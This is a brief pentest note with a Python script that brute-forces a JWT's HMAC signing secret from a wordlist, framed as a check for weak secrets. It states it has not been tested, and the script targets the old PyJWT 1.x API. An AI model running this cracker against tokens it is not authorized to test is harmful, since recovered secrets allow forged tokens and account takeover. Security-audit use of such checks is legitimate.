还未复现,仅记录思路:用字典逐个校验 JWT 的签名密钥(弱密钥检测)。
>pip3 install pyjwt
>python3 crack.py
import jwt
import termcolor
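# Offline check of whether a JWT's shared signing secret appears in a wordlist.
# A hit means the secret is guessable from a single captured token, so the
# finding to report is "rotate to a long random secret, or move the service
# to an asymmetric algorithm".
jwt_str = R'token'  # placeholder: the compact JWT under test

# Claim-validation failures. PyJWT verifies the signature before it validates
# claims, so any of these means the candidate key already matched.
_CLAIM_ERRORS = (
    jwt.exceptions.ExpiredSignatureError,
    jwt.exceptions.InvalidAudienceError,
    jwt.exceptions.InvalidIssuedAtError,
    jwt.exceptions.ImmatureSignatureError,
)

with open('/root/password.txt') as f:
    for line in f:
        key_ = line.strip()
        try:
            # NOTE(review): PyJWT >= 2.0 requires an explicit `algorithms=`
            # list and deprecates the `verify` keyword; this call is written
            # for PyJWT 1.x -- confirm the installed version before relying
            # on the result.
            jwt.decode(jwt_str, verify=True, key=key_)
        except jwt.exceptions.InvalidSignatureError:
            # Wrong candidate: overwrite the progress line and move on.
            print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
            continue
        except _CLAIM_ERRORS:
            # Signature matched; only a claim (exp/aud/iat/nbf) was rejected.
            pass
        # Reached on a clean decode or a claim-only failure: the key is right.
        # Stopping here keeps the for/else below from also printing
        # "not found." after a key has already been reported.
        print('\r', '\bfound key -->', termcolor.colored(key_, 'green'), '<--')
        break
    else:
        # Loop ran to the end without a break: no candidate verified.
        print('\r', '\bnot found.')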
参考:https://github.com/xiaoy-sec/Pentest_Note#%E6%B0%B4%E5%9D%91%E6%94%BB%E5%87%BB